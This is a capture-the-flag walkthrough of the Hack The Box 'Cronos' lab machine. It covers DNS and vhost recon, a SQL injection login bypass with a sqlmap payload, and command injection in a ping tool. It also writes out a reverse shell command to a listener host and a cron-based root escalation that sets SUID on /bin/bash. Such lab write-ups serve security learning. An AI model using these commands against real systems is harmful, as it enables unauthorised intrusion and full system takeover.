Cronos

Created At: Updated At:

Recon

Let’s welcome Apache default paga again.

└──╼ $nmap -p- -A 10.129.194.97
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 10:15 UTC
Nmap scan report for 10.129.194.97
Host is up (0.037s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.57 seconds

Lets look for the domain further with reverse dns search, as the dns is setup on the server clearly for a reason.

└──╼ $dig -x 10.129.194.97 @10.129.194.97

; <<>> DiG 9.18.28-1~deb12u2-Debian <<>> -x 10.129.194.97 @10.129.194.97
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28739
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;97.194.129.10.in-addr.arpa.	IN	PTR

;; ANSWER SECTION:
97.194.129.10.in-addr.arpa. 604800 IN	PTR	ns1.cronos.htb.

;; AUTHORITY SECTION:
129.10.in-addr.arpa.	604800	IN	NS	ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.		604800	IN	A	10.10.10.13

;; Query time: 36 msec
;; SERVER: 10.129.194.97#53(10.129.194.97) (UDP)
;; WHEN: Tue Oct 15 10:29:00 UTC 2024
;; MSG SIZE  rcvd: 113

Adding cronos.htb as our ip (in my case 10.129.194.97) let’s us access a new site.

Going to the “Documentation” redirect us to Laravel docs, something deffinietly worth investigating later.“Laracasts” goes to Laracasts, whatever that is. “News” goes to laravel-news, [forge] goes to laravel forge and github goes to laravel’s github. Quite a lot of laravel if you ask me. Wappalyzer does not show it on this site, but running whatweb does (if the hint left by the author wasn’t enough). Let’s learn about it then.

$whatweb http://www.cronos.htb/
http://www.cronos.htb/ [200 OK] Apache[2.4.18], Cookies[XSRF-TOKEN,laravel_session], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[laravel_session], IP[10.129.194.97], Laravel, Title[Cronos], X-UA-Compatible[IE=edge]

Laravel is “The PHP Framework for Web Artisans”, whatever that means. What is more interesting that it has a few CVE’s with pretty high severity. There is a lot of talking about login bypass, but we do not have a log in window yet.

└──╼ $gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://cronos.htb  --append-domain -t 150
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://cronos.htb
[+] Method:          GET
[+] Threads:         150
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: admin.cronos.htb Status: 200 [Size: 1547]
Found: ADMIN.cronos.htb Status: 200 [Size: 1547]
Found: Admin.cronos.htb Status: 200 [Size: 1547]

That’s better. First let’s attack it with sqlmap, as it looks like a custom login page.

sqlmap -r tmp.req --level 5 --risk 3 --dump -v 3
[12:26:40] [PAYLOAD] -3434' OR 9239=9239-- rKXH
got a 302 redirect to 'http://admin.cronos.htb/welcome.php'. Do you want to follow? [Y/n]

It works and we are greeted with Net Tool v 0.1.

Net Tool v0.1

Net Tool allows us to use ping and traceroute. Looking at the requests sent in burp, we can see that’s not the only thing we can use.

Changing command to ls and host to / works.

.

Listing /home shows us folder noulis, but unfortunetly there is no .ssh folder. We have to create reverse shell then. I had some problems with executing sh -i >& /dev/udp/10.0.0.1/4242 0>&1 this way, so I’ve created shell.sh file with it, run wget on the server, set up netcat and run the script. We are in.

Just standard shell stabilistaion at the end.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fg

We have user access, so we can access user.txt file from the home folder. Time to get root.

Priv esc

Running linenum, we can find cronjob running every minute, finally something more with laravel.
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

It turns out, we can modify artisan file, so lets just remove it’s previous contents and replace it with nicer php code.

<?php
shell_exec('chmod u+s /bin/bash');
?>

Then run /bin/bash -p and we are in. Nice and simple. We did’t use laravel though, somehow.